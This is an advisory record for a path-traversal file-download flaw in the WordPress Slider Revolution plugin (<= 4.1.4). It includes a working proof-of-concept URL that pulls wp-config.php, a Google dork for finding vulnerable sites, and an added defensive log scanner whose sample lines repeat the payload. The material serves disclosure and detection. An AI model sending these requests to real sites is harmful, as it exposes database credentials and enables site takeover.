Vendor: Slider Revolution Responsive WordPress Plugin
By: Claudio Viviani
CVSS: 7.5 (HIGH)
Vulnerability Type: Arbitrary File Download
CWE: 434
Product Name: Slider Revolution Responsive WordPress Plugin
Affected Version From: <= 4.1.4
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 / Mozilla Firefox, Linux / Mozilla Firefox
Year: 2014

WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability

WordPress Slider Revolution Responsive <= 4.1.4 suffers from an Arbitrary File Download vulnerability. An attacker can exploit it by sending a crafted request to the vulnerable application: a path-traversal sequence in the `img` parameter of the plugin's `revslider_show_image` AJAX action (as in the PoC below) causes the plugin to return any file the web server can read, including wp-config.php.

Mitigation:

Update to the latest version of WordPress Slider Revolution Responsive.

Exploit-DB raw data:

# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380

# Software Link : Premium plugin

# Dork Google: revslider.php "index of"
               

# Date : 2014-07-24

# Tested on : Windows 7 / Mozilla Firefox
              Linux / Mozilla Firefox


######################

# Description

WordPress Slider Revolution Responsive <= 4.1.4 suffers from an Arbitrary File Download vulnerability


######################

# PoC

http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


#####################

Discovered By : Claudio Viviani

        http://www.homelab.it
        info@homelab.it
        homelabit@protonmail.ch

        https://www.facebook.com/homelabit
        https://twitter.com/homelabit
        https://plus.google.com/+HomelabIt1/
        https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################
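The following is an added defensive example, not part of the original advisory: it scans constructed access-log lines for `admin-ajax.php?action=revslider_show_image` requests whose `img` parameter resolves outside the plugin's image directory. It assumes that directory is `/wp-content/uploads` (an assumption, not stated in the advisory); the same `escapes_upload_dir` check is what a hardened handler would apply before opening the file.

```python
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Directory the plugin is assumed to serve images from (assumption, not from the advisory).
UPLOAD_BASE = "/wp-content/uploads"
# Only the request target is needed from a combined-format access log line.
LOG_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines, not real traffic; the first mirrors the advisory's PoC URL.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Jul/2014:10:00:01 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3121',
    '10.0.0.6 - - [24/Jul/2014:10:00:02 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=%2e%2e%2fwp-config.php HTTP/1.1" 200 3121',
    '10.0.0.7 - - [24/Jul/2014:10:00:03 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=slider1/banner.jpg HTTP/1.1" 200 48211',
    '10.0.0.8 - - [24/Jul/2014:10:00:04 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 12',
]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly: PHP decodes once before the plugin sees the value,
    so a detector that only greps the raw query for '../' misses encoded forms."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value

def escapes_upload_dir(img):
    """True if img, resolved under UPLOAD_BASE, lands outside it (absolute paths included)."""
    resolved = posixpath.normpath(posixpath.join(UPLOAD_BASE, img.replace("\\", "/")))
    return not (resolved == UPLOAD_BASE or resolved.startswith(UPLOAD_BASE + "/"))

def is_traversal_request(target):
    """Flag admin-ajax.php?action=revslider_show_image calls whose img leaves the upload directory."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    if params.get("action", [""])[0] != "revslider_show_image":
        return False
    return escapes_upload_dir(fully_decode(params.get("img", [""])[0]))

def scan_log(lines):
    """Return the request targets of log lines that match the traversal pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if m and is_traversal_request(m.group("target")):
            hits.append(m.group("target"))
    return hits

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```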